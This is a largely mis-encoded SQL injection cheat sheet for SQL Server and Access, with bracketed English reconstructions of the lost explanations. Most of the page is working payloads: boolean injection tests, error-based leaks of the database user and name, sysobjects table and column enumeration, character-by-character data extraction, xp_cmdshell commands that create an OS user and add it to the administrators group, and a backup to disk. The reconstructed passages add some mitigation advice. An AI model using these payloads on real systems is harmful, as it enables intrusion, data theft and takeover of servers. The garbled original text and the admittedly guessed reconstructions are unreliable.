SQL?????????????

???

Night--

Night’ and 1=1--
Night’ and 1=2--

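[Mis-encoded in the source; reconstructed from the surviving fragments.] The requests above appear to test whether the parameter is injectable. In SQL Server, "--" starts a comment, so whatever followed the parameter in the original statement is ignored. When the value is passed as a bound parameter instead of being concatenated into the statement, the quote and the comment marker are treated as data and the two requests return the same result.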

URL;and user>0--

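[Mis-encoded in the source; reconstructed from the surviving terms.] user is a built-in SQL Server value of type nvarchar. Comparing it with the int 0 makes SQL Server try to convert the nvarchar value to int; the conversion fails, and the error message quotes the nvarchar value ("XXX"), which is the name of the database user. The leak depends on the application returning the raw database error to the client; returning a generic error page and logging the detail on the server removes it.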

URL;and db_name()>0--

????????????

URL;and (select count(*) from sysobjects)>0—

 

 

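[Mis-encoded in the source; reconstructed from the surviving terms.] msysobjects is a system table in Access and sysobjects is a system table in SQL Server; the two count(*) requests on this page appear to be used to tell the two database types apart from the response. The rest of this paragraph is not recoverable.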

 

URL;and (select count(*) from msysobjects)>0--

Night’ and (select count(*) from sysobjects where Xtype=’u’ and status>0)=??????--

????????????ж?????????????????sysobjects?д??????????????б??????????????????xtype=’U’ and status>0 ????????????????????

Night’ and (select  top 1 name from sysobjects where Xtype=’U’ and status>0 )>0--

??????????????

Night’ and (select  top 1 name from sysobjects where Xtype=’U’ and status>0 and name!=’?????????’)>0--

????????????????????????

Night’ and (Select Top lcol_name(object_id(‘????’)??1) from sysobjects)>0--

???sysobjects???????

Night’ and (select top 1 len(????) from ????)>0--

???????????

Night’ and (select top 1 asc(mid(??????1??1)) from ????)>0--

??????????????????????????????б?????????

URL;exec master..xp_cmdshell  “net user ???????????” /add

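[Mis-encoded in the source; reconstructed from the surviving terms.] The statement above uses the stored procedure xp_cmdshell to add an operating-system account. xp_cmdshell is off by default since SQL Server 2005 and is normally restricted to sysadmin, so the statement only succeeds when the web application connects with an over-privileged login; keep the procedure disabled and give the application a least-privilege account.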

URL;exec master..xp_cmdshell  “net localgroup administrators ????? /add”--

???????????????????

URL;backup database ??????? to disk=’·??’;--

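[Mis-encoded in the source; only a stored-procedure term and "HTTP" survive.] The statement above writes a database backup to a disk path; the remainder of the explanation is not recoverable. The application login should not hold BACKUP DATABASE permission, and the SQL Server service account should have no write access to any directory that the web server serves.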